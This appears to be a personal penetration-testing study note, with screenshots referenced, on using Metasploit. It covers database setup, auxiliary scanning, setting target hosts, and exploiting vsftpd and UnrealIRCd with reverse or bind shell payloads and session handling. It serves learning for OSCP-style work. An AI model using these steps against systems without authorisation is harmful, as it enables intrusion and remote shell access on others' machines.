Metasploit - 2fort Security

## What is Metasploit? - Exploit Module - Includes payload - Auxiliary Module - Non-exploit modules ## Starting up Metasploit ``` # initialize metasploit's database by running sudo msfdb init # access Metasploit msfconsole # check database status db_status # use workspace to organize your msfconsole workspace -a <workspace name> # -a to add workspace workspace <workspace name> # change workspace # use these commands to view found services and host services # search for services such as 'ssh' within the services services -S <service type> hosts # run Nmap in msfconsole by using db_nmap <nmap command> ``` **Example: Running Nmap within Msfconsole** ![[metasploit_nmap_example.png]] ## Auxiliary Modules Used for scanning, testing vulnerabilities and gathering information. For example, this scan does not provide detailed information on the version of Samba being run on the computer. ![[metasploit_aux_searchsamba.png]] Search for the module to enumerate / investigate further ``` # in msfconsole run search type:<moduletype: auxiliary OR exploit> <keywords> ``` ![[metasploit_aux_searchsmb.png]] ``` # see more information about the module info <# '1,2,3 etc.' of the module in search result> ``` ![[metasploit_aux_info.png]] ``` # to use the module, run use <# '1,2,3 etc.' of the module> ``` ![[metasploit_aux_use.png]] ``` # run options to see what information is required for the module to run options # tell msfconsole what is the rhost target IP set rhosts <IP> # if it's rhosts, it can work with multiple target IP adddress (if it's just 'rhost', it is a single target module) you can set one or multiple rhosts using set rhosts <IP>,<IP>,<IP> # multiple individual IP set rhosts <IP>-<IP> # IP range set rhosts <IP/CIDR> # CIDR set rhosts file:/path/to/iplist # file with list of IP # set global rhosts to save so it can be reused across other modules, you can 'setg' for other fields setg rhosts <IP> # use 'run' or 'exploit' to start run ``` **'rhosts' field is empty and it's required so user needs to input target IP** ![[metasploit_aux_options.png]] **Running the module** ![[metasploit_aux_run.png]] **After running, services is now updated with the latest information** ![[metasploit_aux_updatedservices.png]] ``` # to exit back to msfconsole back #to end the entire session, type 'quit' to close msfconsole quit ``` **Best practice: update these findings into cherrytree** ## Exploit Modules ``` # search type:<module type> <Keywords> search type:exploit/auxiliary vsftpd # or just search vsftpd # use <# of search result> to select module use 0 # set options options # use info to see more information info ``` ![[metasploit_exploit_options.png]] Exploits always need a payload to run ![[metasploit_exploit_setrhost.png]] exploit running ![[metasploit_exploit_bindshell_run.png]] ``` # we can put the session into a background process, minimizing it and going back to msfconsole background # see a list of running sessions sessions # help menu sessions -h # interact with specified ID, bring it back from background session -i <number> ``` ![[metasploit_exploit_sessions.png]] ``` # to end the session, kill a specified ID connection sessions -k <number> ``` For defender's to close off the port, use the firewall to close off the intruder ## Setting up Exploit & Payload Example exploiting UnrealIRCd ``` # search for correct module in msfconsole search type:exploit unrealirc # select module use <id> # select service using number: 1,2,3 etc. # set rhost (target machine), lhost (attacker machine) if reverse shell [target connects to attacker] set rhost <target IP> set lhost <attacker IP> # look through and set payload, start from generic exploits and use reverse shell exploits before bind shell exploits show payloads set payload <id> # run the exploit with the set payload run # to end msfconsole exit ``` ![[metasploit_exploit_reverseshell_run.png]] Identify reverse or bind shell exploit via ports used: - Initiating side of connect will use random port in high range to connect - e.g. 54214 is connecting to attacker machine's 4444 (reverse shell) - or attacker machine's 4444 is connecting to 37259 (bind shell) ![[metasploit_exploit_identify_shell.png]] ## Metapreter [[Meterpreter]] footnote: OSCP only allows you to use Metasploit once for 1 out of 5 machines so red teamers need to learn to exploit manually References [[https://pentesthacker.wordpress.com/2020/12/30/exploiting-postgresql-with-metasploit/]] #pentest #metasploit